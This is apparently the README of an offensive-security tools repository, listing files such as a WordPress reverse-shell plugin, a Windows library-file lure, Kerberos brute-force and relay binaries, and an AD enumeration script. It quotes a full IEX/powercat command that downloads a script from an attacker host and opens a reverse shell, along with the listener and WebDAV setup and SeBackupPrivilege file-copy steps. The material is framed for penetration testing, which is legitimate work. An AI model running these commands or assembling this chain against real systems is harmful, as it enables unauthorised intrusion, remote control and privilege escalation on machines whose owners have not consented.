/offensive

Tips and tricks etc.

Primary LanguagePowerShell

offensive
---------
Tips and tricks etc. for offensive security and testing

anonsamba.conf
|
'-->  A config file to enable anonymous SMB share. Just replace interfaces with whatever IP net and interface you use and set
      log dir and path for the share, easiest at /home/sharedir (also "chmod -R ugo+w /home/sharedir" remember to disable after 
      use, in this share the users have all permissions). Replace /etc/smb.conf with this one (remember to copy the default 
      smb.conf and revert after use. To enable the new conf or reverted conf: "sudo systemctl restart smbd"
      
BackdoorPlug.php
|
'-->  A WordPres plugin containing reverse shell. 
      Prerequirements: you need access to the WP to upload and activate plugins.
      Just change the host/port to whatever your listener is running on and maybe adjust the shell accordingly too, then just zip 
      it, upload the zip as a plugin and activate the plugin to get connected with the WP-instance.

checklist
|
'-->  A very basic list of pentest steps.

config.Library-ms
|
'-->  A config library file to open a connection to the address defined in the simple location url, which for example serves 
      malicious Windows shortcut to execute some nasty powershell like:
        powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.12.34:9090/powercat.ps1'); powercat 
        -c 192.168.12.34 -p 4000 -e powershell"
      Here you should have the following: 
        - wsgidav (WebDAV: wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/username/webdav/) server running, 
          serving the Windows shortcut file, which runs the command above
        - a Python httpd (python -m http.server 9090) serving the powercat.ps1
        - a netcat listener (nc -nvlp 4000) or similar to catch the resulting reverse shell.

dorks.google
|
'-->  Some random Google dorks to leverage while enriching your case data

enumhelper.ps1
|
'-->  A helper script for AD enumeration and lateral movement. Built on-the-go so might contain a lot of logical fallacies and 
      missing lots of error checks.
      Check the help section before running: .\enumhelper.ps1 "help" for somewhat of instructions.
      Can do: 
        - LDAP queries
        - User/pass testing over LDAP-query
        - List all properties of LDAP response object
        - Get the value of a specific LDAP property
        - Get all SPNs and related objects
        - Check if any SPNs are tied to a (service)account
        - Get DC info: name, hostname, OS, OS version, IPv4 and IPv6
        - Get AD device info: name, hostname, OS, OS SP, OS version, IPv4 and IPv6
        - Get AD user/group info by SID (converting a SID to a name for example)
        - Create PsExec.exe or PsExec64.exe
        - SID lookup from AD
        - DCOM lateral movement leveraging MMC
          - Also the possibility of building a reverse-shell command and initiating it on the target
        - Remote connectiong over PowerShell
        - Remote commands over WMI, WINRS, PsExec or PsExec64:
          - Also the possibility of building a reverse-shell command and initiating it on the target

Get-Shortcut.ps1
|
'-->  Get shortcut (.lnk) info via PowerShell. Just import-module .\Get-Shortcut.ps1 and you can go: Get-Shortcut c:\path\to\link.lnk
      
kerbrute_linux_amd64
|
'-->  An awesome tool for Kerberos bruting from https://github.com/ropnop/kerbrute, here's a pre-built
      64bit Linux binary
      
KrbRelayUp.exe
|
'-->  Kerberos Relay attack binary. 
      Lost my mind trying to get this to build so then just ended up getting a prebuilt one from
      https://kb.offsec.nl/tools/techniques/krbrelayup/, thanks! The source is available at:
      https://github.com/Dec0ne/KrbRelayUp
      
nix-shell-tricks
|
'-->  Common tips and tricks etc. to use in Linux shell when being offensive or otherwise enumerating

php-trickery
|
'-->  Some PHP-tricks for offensive security

reverse_shell.aspx
|
'-->  Not my creation, credit goes to INSOMNIA SECURITY :: InsomniaShell.aspx, 
      brett.moore@insomniasec.com ::  www.insomniasec.com

SeBackupPrivilegeCmdLets.dll
SeBackupPrivilegeUtils.dll
|
'--> Precompiled dlls from https://github.com/giuliano108/SeBackupPrivilege for leveraging 
     SeBackupPrivileged AD account. These are prebuilt x64, if you need other then you
     need to build them yourself from giuliano's source. Otherwise:
            Import-Module .\SeBackupPrivilegeUtils.dll
            Import-Module .\SeBackupPrivilegeCmdLets.dll
            Set-SeBackupPrivilege
            Copy-FileSeBackupPrivilege .\un_accessible_document.pdf c:\temp\now_accessible.pdf -Overwrite

sqli-tips
|
'-->  Tips for SQL injections

winbin.sh
|
'-->  Whip up custom executable/dll on the fly. So far only supports creating a x64 executable/dll for 
      adding a defined user with a defined password to the Administrators group or changing an existing user's password. 
      For example if you need to replace a bin which you have full control over to gain further foothold or to leverage a 
      missing DLL etc.

windows-shell-tricks-and-ad-tips
|
'-->  Common tips and tricks etc. to use with PowerShell / cmd when being offensive or otherwise enumerating and getting to know AD